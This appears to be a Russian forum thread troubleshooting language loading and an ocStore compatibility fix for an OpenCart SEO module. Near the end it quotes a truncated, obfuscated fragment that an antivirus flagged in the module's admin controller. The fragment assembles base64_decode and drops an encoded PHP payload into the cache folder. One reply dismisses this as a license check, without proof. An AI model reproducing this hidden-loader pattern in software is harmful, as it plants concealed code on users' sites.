Модуль Complete SEO Package Opencart v5.7.1

вы вообще то видите что я писал ? он там и лежит ! но не подтягивается, тянется языковый файл с тнглиша !. на тройке получается что тянется с русской папки, а недостающие переменные тянутся из второго файла complete_seo_eng.php
мне кажется на скринах все прекрасно видно.
Ну конечно вижу такого файла complete_seo_eng.php вообще не должно быть(подозреваю это просто бекап), если лежит и не тянется значит где то недоглядели, загляните в лог ошибок может там подсказка будет какая. Не обижайтесь но на ваших скриншотах не видно где лежат файлы, а "там" в программировании не работает.
 
вы внимательно читали что я писал ?
Я внимательно читал, пробуйте вариант скопируйте инклуд из admin\language\ru-ru\module\extension и положите admin\language\ru-ru\module а сам русский перевод положить по адресу подключения admin\language\russian\module, проверьте опубликован ли рус язык в админке/локализация/языки и выбран по умолчанию.
 
Я внимательно читал, пробуйте вариант скопируйте инклуд из admin\language\ru-ru\module\extension и положите admin\language\ru-ru\module а сам русский перевод положить по адресу подключения admin\language\russian\module, проверьте опубликован ли рус язык в админке/локализация/языки и выбран по умолчанию.
может я не особо понятно сказал. но закидывал во все папки какие можно. перепробовал все варианты. не тянет он с русской папки нечего. в админке всего один язык, русский. https://skr.sh/sK90q3Ga13Y?a
и как вы обьясните что в тройке то что не переведено на русский подтягивает на английском ? скрин выше. файлы все одинаковые из одного архива.
проверить по какому пути что тянет в контроллере не могу, контроллер обрублен https://skr.sh/sK9xs0o5Ini?a видно что т в него откуда то еще тянется, пока не разбирался, если прописать принтовать что то выдает ошибку.
 
может я не особо понятно сказал. но закидывал во все папки какие можно. перепробовал все варианты. не тянет он с русской папки нечего. в админке всего один язык, русский. https://skr.sh/sK90q3Ga13Y?a
и как вы обьясните что в тройке то что не переведено на русский подтягивает на английском ? скрин выше. файлы все одинаковые из одного архива.
проверить по какому пути что тянет в контроллере не могу, контроллер обрублен https://skr.sh/sK9xs0o5Ini?a видно что т в него откуда то еще тянется, пока не разбирался, если прописать принтовать что то выдает ошибку.
Вы английский на русский в каком файле подменяли, по какому пути? Попробуйте переместить/переименовать каталоги english и en-gb на время, какой то косяк есть может даже не в модуле если с admin\language\russian\module не тянет, другие модули в админке на русском?
 
русский закидываю admin/language/english/module отсюда и тянет языковый файл.
все остальное в админке на русском.
если из инглиш вообще убрать или закоментить файл то прут просто переменные. хотя в русском во все папки накидал языковый файл.
 
русский закидываю admin/language/english/module отсюда и тянет языковый файл.
все остальное в админке на русском.
если из инглиш вообще убрать или закоментить файл то прут просто переменные. хотя в русском во все папки накидал языковый файл.
А каталоги английские пробовали убрать на время? Если не помогает, то остается только использовать метод с подменой, недостающие переменные возьмите из архива admin/language/english/module/complete_seo.php. Не понимаю почему тянет анлийский если в админке его нет вообще, кеш системы и модификаторов чистили?
 
да все пробовал. толку 0. тянет с инглиша только
 
модуль сам по себе работает нормально. да все уже перечищено обновлено и т.д. ))) по сути получается что модуль не видит русскую папку. почему ? это хз. проверить не могу, по причине что писал выше.
 
Попробуйте английскую локаль заинклюдить на русскую папку, то есть заменить в admin\language\en-gb\module\extension\complete_seo.php english на russian что бы отсеять проблему с каталогом/правами.
 
да что угодно можно бросать в русскую папку хоть английскую версию, хоть китайскую ) не видит русские папки. в общем бросил русскую версию в инглиш, и надо дописать недостающий текст с английской в русскую. это будет быстрее чем искать проблему.
 
Антивирус imunify 360 в файле /admin/controller/module/complete_seo.php нашел вредоносный код! в зашифрованном куске кода $f2='ba'.'se'.(9*7+1).'_'.'de'.'c'.'ode'; file_put_contents(DIR_CACHE.'gklp.tmp',$f2('PD9waHAgZ290byBhbXpZVDsgenp1czI6ICRkcWdpVCA9IGlzc2V0KCR0aGlzLT5yZXF1ZXN0LT5nZXRbIlwxNjJcMTQ1XDE0Nlx4NzJceDY1XDE2M1x4NjgiXSkgPyAxIDogcmFuZCgxLCAxMikgPT0gMjsgZ290byBORTIyVzsgbmFtM3Y6IGdvdG8gZE5zMEE7IGdvdG8gUVV1TUs7I...... После удаления этого фрагмента модуль продолжает работать проблем не замеченно
 
Антивирус imunify 360 в файле /admin/controller/module/complete_seo.php нашел вредоносный код! в зашифрованном куске кода $f2='ba'.'se'.(9*7+1).'_'.'de'.'c'.'ode'; file_put_contents(DIR_CACHE.'gklp.tmp',$f2('PD9waHAgZ290byBhbXpZVDsgenp1czI6ICRkcWdpVCA9IGlzc2V0KCR0aGlzLT5yZXF1ZXN0LT5nZXRbIlwxNjJcMTQ1XDE0Nlx4NzJceDY1XDE2M1x4NjgiXSkgPyAxIDogcmFuZCgxLCAxMikgPT0gMjsgZ290byBORTIyVzsgbmFtM3Y6IGdvdG8gZE5zMEE7IGdvdG8gUVV1TUs7I...... После удаления этого фрагмента модуль продолжает работать проблем не замеченно
Как подсказал Таблеткин это закомментированная стучалка по поводу лицензии, у антивируса ложное срабатование
 
Опенкарт русской сборки (чистый опэн) работают с модом. Для ОСстора там в папке _extra files лежит seo_package_compat_ocstore.xml
испытал фикс на ocstore 3.0.3.7 - ничего не изменилось, не находит исправление
Parse error: syntax error, unexpected 'else' (T_ELSE) in ../modification/catalog/controller/startup/seo_url.php on line 602
 
Копайте в сторону модификаторов
Error:
Код:
Parse error: syntax error, unexpected 'else' (T_ELSE) in ../modification/catalog/controller/startup/seo_url.php on line 602
Вот фикс для OcStore 3.0.3.7(у меня сработало, может ещё кому поможет)
Первый раз пишу модификатор, не судите строго
Код:
<?xml version="1.0" encoding="utf-8"?>
<modification>
  <id>Patch for compatibility SEO ocstore</id>
  <name>SEO Complete Fix</name>
  <code>fix_oc3_seo_installer</code>
  <version>1.0</version>
  <author>prolegion</author>
 
    <file path="catalog/controller/*/seo_url.php" error="skip">
        <operation>
            <search><![CDATA[$this->request->get['route'] = $query->row['query'];]]></search>
          <add position="replace" offset="3"><![CDATA[$this->request->get['route'] = $query->row['query']; }]]></add>
        </operation>
    </file>
</modification>
 
Назад
Верх